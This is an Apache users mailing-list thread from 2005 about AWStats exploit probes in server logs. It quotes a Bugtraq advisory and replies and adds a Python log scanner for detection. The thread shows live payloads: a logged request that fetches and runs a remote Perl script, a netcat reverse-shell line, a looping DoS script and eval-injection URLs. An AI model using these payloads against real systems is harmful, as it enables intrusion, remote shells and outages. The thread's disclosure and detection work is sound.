Posted to users@httpd.apache.org by Konstantine <li...@gmail.com> on 2005/10/22 08:07:48 UTC

[users@httpd] GET //awstats.pl? in apache logs

My apache logs show rows after rows of following, all from various IP
addresses. This started a couple of days ago. I don't have awstats.
Could somebody tell me what is that? Is there anything I should be
doing? thanks.K.
GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo|
HTTP/1.1

Re: [users@httpd] GET //awstats.pl? in apache logs

Posted by Konstantine <li...@gmail.com>.
On 10/22/05, Dave Floyd <da...@pa.press.net> wrote:
> >My apache logs show rows after rows of following, all from various IP
> >addresses. This started a couple of days ago. I don't have awstats.
> >Could somebody tell me what is that? Is there anything I should be
> >doing? thanks.K.
> >GET
> >//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20htt
> >p://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*
> >;echo|
> >HTTP/1.1
> >
> >
> >---------------------------------------------------------------------
>
> Konstantine,
>         provided you don't have one of the vulnerable versions of
> awstats installed just give a prayer of thanks. If you have a version
> covered by the following mail, try to disable or upgrade:
>
<snip>

I see. No, I don't have awstats installed. I was trying to get by with
minimum possible for the purposes of this machine. Thanks for your
time. K.

Re: [users@httpd] GET //awstats.pl? in apache logs

Posted by Dave Floyd <da...@pa.press.net>.
>My apache logs show rows after rows of following, all from various IP
>addresses. This started a couple of days ago. I don't have awstats.
>Could somebody tell me what is that? Is there anything I should be
>doing? thanks.K.
>GET 
>//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20htt 
>p://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl* 
>;echo|
>HTTP/1.1
>
>
>---------------------------------------------------------------------

Konstantine,
	provided you don't have one of the vulnerable versions of 
awstats installed just give a prayer of thanks. If you have a version 
covered by the following mail, try to disable or upgrade:

At 8:10 +0000 14/2/2005, GHC@www.securityfocus.com,
	[ru]@securityfocus.com@www.securit wrote:
>X-VirusChecked: Checked
>X-Env-Sender: bugtraq-return-18123-dave.floyd=pa.press.net@securityfocus.
>  com
>X-StarScan-Version: 5.4.11; banners=-,-,-
>X-Originating-IP: [205.206.231.27]
>X-SpamWhitelisted: domain whitelist
>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <ma...@securityfocus.com>
>List-Help: <ma...@securityfocus.com>
>List-Unsubscribe: <ma...@securityfocus.com>
>List-Subscribe: <ma...@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Date: 14 Feb 2005 08:10:40 -0000
>From: GHC@www.securityfocus.com,
>	[ru]@securityfocus.com@www.securityfocus.com <fo...@ghc.ru>
>To: bugtraq@securityfocus.com
>Subject: AWStats <= 6.4 Multiple vulnerabilities
>
>
>
>/*==========================================*/
>// GHC -> AWStats <- ADVISORY
>\\ PRODUCT: AWStats     
>// VERSION: <= 6.3
>\\ URL: http://awstats.sourceforge.net/
>// VULNERABILITY CLASS: Multiple vulnerabilities
>\\ RISK: high
>/*==========================================*/
>
>[Product Description]
>"AWStats is a free powerful tool that generates advanced web, ftp or 
>mail server statistics, graphically.
>This log analyzer works as a CGI or from command line and shows you 
>all possible information your log contains,
>in few graphical web pages".
>Current stable version: AWStats 6.3 final 
>Development version is 6.4 - 2005-02-06 14:31
>
>[Summary]
>Successful exploitation of an input validation vulnerability in 
>AWStats scripts
>allows attackers to execute limited perl directives under the privileges of
>the web server, get sensitive information.
>Some actions of the attacker can lead to denial of service.
>
>[Details]
>Some AWStats's functions can be extended with plugins.
>Two variables (loadplugin & pluginmode) are dealing with it.
>The first one (loadplugin) is responsible for plugins list (plugin1, 
>plugin2); the second one
>runs plugin's functions.
>
>Exploitable example (raw log plugin):
>http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadpl 
>ugin=rawlog 
>
>Server answer:
>192.*.*.* - - [26/Jan/2005:11:01:41 +0300] "GET /cgi-bin/index.cgi 
>HTTP/1.1" 500 606
>192.*.*.* - - [26/Jan/2005:11:03:54 +0300] "GET /cgi-bin/index.cgi 
>HTTP/1.1" 500 606
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET 
>/themes/standard/style.css HTTP/1.1" 200 2986
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /cgi-bin/index.cgi 
>HTTP/1.1" 200 7710
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET 
>/themes/standard/images/logo.gif HTTP/1.1" 200 14443
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/xml.gif 
>HTTP/1.1" 200 429
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/pb_yawps.gif 
>HTTP/1.1" 200 2532
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET 
>/themes/standard/images/valid-html401.gif HTTP/1.1" 200 2250
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET 
>/themes/standard/images/vcss.gif HTTP/1.1" 200 1547
>192.*.*.* - - [26/Jan/2005:11:08:06 +0300] "GET /cgi-bin/forum.cgi 
>HTTP/1.1" 200 7333
>192.*.*.* - - [26/Jan/2005:11:08:11 +0300] "GET /cgi-bin/links.cgi 
>HTTP/1.1" 200 7588
>192.*.*.* - - [26/Jan/2005:11:08:12 +0300] "GET /cgi-bin/top10.cgi 
>HTTP/1.1" 200 7910
>192.*.*.* - - [26/Jan/2005:11:08:17 +0300] "GET /cgi-bin/admin.cgi 
>HTTP/1.1" 200 7340
>192.*.*.* - - [26/Jan/2005:11:08:33 +0300] "GET /yawpsnews.xml 
>HTTP/1.1" 200 153   
>
>The dangerous fact is that attacker can read sensitive information such as
>IP address, admin scripts names, non encoded GET queries, etc.
>
>Our variables pass some verification (as others), but it is not 
>enough for security:
>
>sub Sanitize {
> my $stringtoclean=shift;
> $stringtoclean =~ s/[^\w_\-\\\/\.:\s]//g;
> return $stringtoclean;
>}
>
>Deletes everything but '_', '-', '\', '/', '.', ':' and any blank symbol.
>It's enough for variables with path to configuration files, but not 
>for plugin tasks.
>In case of "loadplugin" & "pluginmode" developers obviously have a 
>lot of trust to the user.
>
>So, let's see what can be done, in fact.
>
>[1] Perl code execution.
>http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
>
>we'll get the action in next piece of code:
>
># AWStats output is replaced by a plugin output
>if ($PluginMode) {
> my $function="BuildFullHTMLOutput_$PluginMode()";
> eval("$function");
> if ($? || $@) { error("$@"); }
> &html_end(0);
> exit 0;
>}
>
>If variable exists, we'll get code execution. This happens after 
>sanitizing (see previous).
>Here we have the interesting part in:
>     my $function="BuildFullHTMLOutput_$PluginMode()";
>     eval("$function");
>
>This is subroutine call (As example sub BuildFullHTMLOutput_rawlog() from
>rawlog.pm plugin).
>Ideal case: "module name"::BuildFullHTMLOutput_"function name"().
>But if we won't specify the name of module (with "loadplugin" 
>parameter) we'll get the next:
>
>main::BuildFullHTMLOutput_"function name"().
>
>By the way, there is a permitted symbol ':' in user input parameters. 
>So, we can send:
>
>PluginMode=:print+getpwent
>
>And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
>This will satisfy eval() requirements, and :print getpwent() is executed.
>
>http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:pri 
>nt+getpwent
>
>Sanitizing limits user's input, but there is no filtration for call 
>symbols '()'.
>Here we can see that somebody can perform DoS attack.
>This is example of simple code for successful DoS exploitation:
>
>#!/usr/bin/perl
>
>use IO::Socket;
>$server = 'www.example.com';
>sub ConnectServer {
> $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => 
>"$server", PeerPort => "80")
> || die "Error\n";
> print $socket "GET 
>/cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep 
>HTTP/1.1\n";
> print $socket "Host: $server\n";
> print $socket "Accept: */*\n";
> print $socket "\n\n";
>}
>
>while () {
> $rp = rand;
> &ConnectServer;
>}
>
>[BUGFIX]
>Change vulnerable code for:
>
>sub PluginSanitize {
> my $stringtoclean=shift;
> $stringtoclean =~ s/[^\w]//g;
> return $stringtoclean;
>}
>
>
>[2] Arbitrary plugin including.
>http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../ 
>usr/libdata/perl/5.00503/blib
>
>Arbitrary module from user's input through "loadplugin" parameter 
>can be included with  "require" function..
>
>Bugfix - as above or something like this:
>
>opendir (PDIR, './plugins');
>@FilesPDIR = readdir(PDIR);
>closedir (PDIR);
>foreach $FilesPName (@FilesPDIR) {
> if ($FilesPName =~ m/$loadplugin/) {
> }
>}
>
>The good thing is the poison null-byte (%00) has no place (transfers to 00).
>
>[3] Sensitive information leak in AWStats version 6.3(Stable) - 
>6.4(Development).
>Every user can access debug function:
>http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1
>http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2
>                                                                
>
>[DISCLOSURE TIMELINE]
>
>10-02-2005  Initial vendor notification.
>14-02-2005  No response.
>14-02-2005  Bug-traq post.            
>
>/* ================================================== */
>/* www.ghc.ru -- security games & challenges          */
>/* ================================================== */
>/* greets to: RST.void.ru, cr0n & all quest hunters %)*/
>/* Special respect to e-defense.                      */
>/* ================================================== */
>
>At 16:24 +0100 15/2/2005, Ondra Holecek wrote:
>>|
>>| PluginMode=:print+getpwent
>>|
>>| And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
>>| This will satisfy eval() requirements, and :print getpwent() is executed.
>>|
>>| 
>>http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:prin 
>>t+getpwent
>>|
>>| Sanitizing limits user's input, but there is no filtration for 
>>call symbols '()'.
>>
>>no, user is not limited, he can execute ANY command if he adds ; at the
>>end of the command, try this
>>
>>awstats.pl?&PluginMode=:print+system('id')+;
>>
>>or even this
>>
>>awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
>
>At 14:25 -0500 15/2/2005, Jamie Pratt wrote:
>>
>>So what are the conditions of this bug/vuln?  I can't reproduce 
>>this on several 6.3 installs..:
>>
>>awstats 6.3 from source:
>>
>>request:
>>
>>http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+sy 
>>stem('id')+;
>>
>>output:
>>****************
>>Error: Can't locate object method "BuildFullHTMLOutput_print" via 
>>package "systemid" (perhaps you forgot to load "systemid"?) at 
>>(eval 1) line 1.
>>
>>Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or 
>>permissions) may be wrong.
>>Check config file, permissions and AWStats documentation (in 'docs' 
>>directory).
>>***************
>
>At 20:52 +0100 15/2/2005, Ondra Holecek wrote:
>>
>>It seems this bug works only on my server, I don't know why
>>
>>/awstats.pl?&PluginMode=:print+system('id')+;
>>
>>reply:
>>
>>uid=99(nobody) gid=4294967295 groups=4294967295,98(nobody) 256
>>Error:
>>
>>Setup ('/usr/local/etc/awstats/awstats.conf' file, web server or
>>permissions) may be wrong.
>>Check config file, permissions and AWStats documentation (in 'docs'
>>directory).
>>
>>
>>awstats: Advanced Web Statistics 6.1 (build 1.751)  (original)
>>perl: This is perl, v5.8.5 built for i586-linux
>>os: Linux xxx.tld 2.4.22 #4 Wed Jul 7 21:07:03 CEST 2004 i586 unknown
>>unknown GNU/Linux
>
>At 16:38 -0500 15/2/2005, Herman Sheremetyev wrote:
>>
>>It works on mine too, though I still have 6.1.  I think you may 
>>need to add the config=www.example.com into the url between the '?' 
>>and the '&' for it to work properly though.  On my linux boxes with 
>>apache 2.0 it displays the command output in the page but on 
>>openbsd with apache 1.3 it gives a 500 Server Error because the 
>>output ends up in the headers somehow.  Either way it works though.
>
>At 22:23 +0100 15/2/2005, Ondra Holecek wrote:
>>
>>I'm sorry I didn't write it, only awstats 6.1 and 6.2 are vulnerable to this
>>bug (system('id'), etc.)
>
>At 12:53 -0800 15/2/2005, William Pratt wrote:
>>
>>Same thing here on both 6.3 and 6.4. I am unable to reproduce this.
>>
>>
>>Error: Can't locate object method "BuildFullHTMLOutput_print" via 
>>package "systemid" (perhaps you forgot to load "systemid"?) at 
>>(eval 1) line 1.
>>
>>Setup 
>>('/usr/local/apache/root/billpratt_net/cgi-bin/awstats/awstats.conf' f 
>>ile, web server or permissions) may be wrong.
>>Check config file, permissions and AWStats documentation (in 'docs' 
>>directory).
>>
>>William Pratt
>>Sr. Engineering Application Developer
>>Megapath Networks, Inc.
>>Http://www.MegaPath.net
>>
>>I wish there was a knob on the TV to turn up the intelligence. 
>>There's a knob called "brightness", but it doesn't seem to work.
>
>At 17:19 -0500 15/2/2005, Jeffrey Wilkinson wrote:
>>
>>Nonetheless, each of these causes AWstats to disclose the full path to the
>>AWstats installation, regardless if *nix or Windows.  That alone is enough
>>for concern.
>
>At 14:00 -0700 15/2/2005, twebster@daksoft.com wrote:
>>
>>You may need to specify an awstats config to view
>>
>>example:
>>
>>http://www.site.org/awstats/cgi-bin/awstats.pl?config=websitename&Pl 
>>uginMode=:print+system('id')+
>>;
>
>At 16:46 -0500 15/2/2005, Jamie Pratt wrote:
>>
>>Still no dice on 6.3, even with the "config=www.site.org" etc,etc.. 
>>same error. So.. Can we all agree that 6.3 is not vulnerable, 
>>because I'd rather not upgrade to a dev/unstable release for no 
>>reason...
>
>At 9:47 -0500 16/2/2005, Thom Craver wrote:
>>
>>I can confirm the bug on 6.3 running Apache 2.0.52.
>>
>>Furthermore, ANY system command inserted in the system() call can 
>>be executed.  This is a very serious bug.  Unprivileged user or 
>>not, with an  .rhosts file on a potential attacker's end, scp would 
>>work just nicely, then a chmod, then execution of any script they 
>>wanted to upload.
>>This issue is not to be taken lightly.
>>
>>Until this issue is resolved, we have commented out the Plugin lines:
>># AWStats output is replaced by a plugin output
>>if ($PluginMode) {
>>      my $function="BuildFullHTMLOutput_$PluginMode()";
>>      eval("$function");
>>      if ($? || $@) { error("$@"); }
>>      &html_end(0);
>>      exit 0;
>>}
>>
>>If a plugin is called, it is apparently ignored and the stats are displayed.
>>
>>--
>>Thom Craver
>>Corporate Communications, Inc.
>>www.corp-com.com
>
>At 7:45 +0000 16/2/2005, K-OTiK Security wrote:
>>
>>6.4 was released on 2005-02-14 13:13
>>
>>Fixes:
>>- Fix security hole that allowed a user to read log file content even
>>  when plugin rawlog was not enabled.
>>- Fix a possible use of AWStats for a DoS attack.
>>- configdir option was broken on windows servers.
>>- Minor fixes
>>
>>Regards
>>K-OTik Security Research & Monitoring Team 24/7
>>http://www.k-otik.com/english
>
>
>At 15:52 -0500 16/2/2005, Micah Brandon wrote:
>>
>>	I'm going to have to disagree.  Execution of Perl functions
>>is still possible in 6.3.  You just have to jimmy it a little and
>>try/guess different plugins that may be installed.  I got a hit
>>with 'hostinfo'.  Try this on your server:
>>
>>http://server/cgi-bin/awstats.pl?config=someconfig&PluginMode=hostinfo+time
>>
>>	Unix time shows up just below 'Whois command failed' error message. 
>>That's game over in my book.
>
>At 20:34 -0500 16/2/2005, Michael Scheidell wrote:
>>
>>And the skiddies who tried to exploit something that didn't exist on our
>>site:
>>(this goes on for some time, here is just a snippet)
>>
>>So, anyone out there who decided to do a 'wait and see', don't.
>>
>>Disable awstats, use access rules, upgrade it or all three.
>>
>>217.172.168.109 - - [03/Feb/2005:12:28:28 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>>217.172.168.109 - - [03/Feb/2005:12:28:29 -0500] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>>
>>64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>>64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>>64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>>64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //awstatswwwroot/cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>>64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>>64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>>64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/cgi-bin/awstats.pl
>
>At 14:01 -0500 17/2/2005, Matt Wilder wrote:
>>
>>Awstats version 5.6 is not susceptible to this as it does not have the
>>same plugin architecture.  Could this be a >= 6.0 bug?
>
>At 14:46 +0000 18/2/2005, newbug Tseng wrote:
>>
>>Hi.
>>Please check 
>>http://packetstormsecurity.org/0501-exploits/AWStatsVulnAnalysis.pdf
>>there're some code analysis for awstats.
>
>At 22:26 +0000 3/5/2005, Laurent Destailleur wrote:
>> >Subject: AWStats <= 6.4 Multiple vulnerabilities
>>>
>>
>>Must read AWStats <= 6.3. Version 6.4 is not affected.
>
>


rgds

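A defender-side check for Konstantine's "is there anything I should be doing?", added here as an example and not code from any post in this thread: a Python scanner that parses Apache access-log lines, flags awstats.pl requests whose configdir carries a pipe, and reuses the advisory's two Perl character classes to flag pluginmode/loadplugin values that the original Sanitize() would pass through but the proposed \w-only PluginSanitize() would strip. The log lines, IPs and timestamps are constructed; the request patterns are the ones quoted above.

```python
import re
from urllib.parse import parse_qs

# Character classes from the advisory's Perl, transcribed to Python.
# Original AWStats Sanitize(): strips everything except \w _ - \ / . : and whitespace.
ORIG_SANITIZE = re.compile(r"[^\w_\-\\/.:\s]")
# Advisory's proposed PluginSanitize(): strips everything except \w.
PLUGIN_SANITIZE = re.compile(r"[^\w]")
# Apache combined log format; only the fields used below are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" (?P<status>\d{3})')

def plugin_value_escapes_wordchars(value):
    """True when the two sanitizers disagree, i.e. the value relies on ':', '/', '.' or whitespace, which Sanitize() passes on to eval()/require."""
    return ORIG_SANITIZE.sub("", value) != PLUGIN_SANITIZE.sub("", value)

def inspect_request(target):
    """Return the reasons a request target looks like an AWStats probe ([] if clean)."""
    path, _, query = target.partition("?")  # manual split: '//awstats.pl' would confuse urlsplit
    if not path.lower().endswith("awstats.pl"):
        return []
    params = {k.lower(): v for k, v in parse_qs(query).items()}
    reasons = []
    for value in params.get("configdir", []):
        if "|" in value:  # the pipe seen in the scans quoted in this thread
            reasons.append("configdir contains '|' (command injection probe)")
    for name in ("pluginmode", "loadplugin"):
        for value in params.get(name, []):
            if plugin_value_escapes_wordchars(value):
                reasons.append(f"{name}={value!r} passes Sanitize() but not a \\w-only filter")
    if "debug" in params:
        reasons.append("debug= parameter (information disclosure)")
    return reasons

def scan_log(lines):
    """Return (ip, target, reasons) for every log line that trips a rule."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (reasons := inspect_request(m.group("target"))):
            findings.append((m.group("ip"), m.group("target"), reasons))
    return findings

# Constructed sample lines: IPs and timestamps are invented; the request targets are
# the patterns quoted in this thread.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Oct/2005:08:01:11 +0000] "GET //awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "-"',
    '203.0.113.7 - - [22/Oct/2005:08:01:12 +0000] "GET /cgi-bin/awstats.pl?config=site&PluginMode=:print+getpwent HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [22/Oct/2005:08:02:00 +0000] "GET /cgi-bin/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib HTTP/1.1" 500 606 "-" "-"',
    '198.51.100.4 - - [22/Oct/2005:08:02:30 +0000] "GET /cgi-bin/awstats.pl?config=site&pluginmode=rawlog&loadplugin=rawlog HTTP/1.1" 200 7710 "-" "-"',
    '192.0.2.9 - - [22/Oct/2005:08:03:00 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "-"',
]

if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target, "; ".join(reasons))
```

Run it against a real access_log with `scan_log(open("access_log"))`; the rawlog request with plain \w values is deliberately left alone, so legitimate plugin use does not alert.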

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org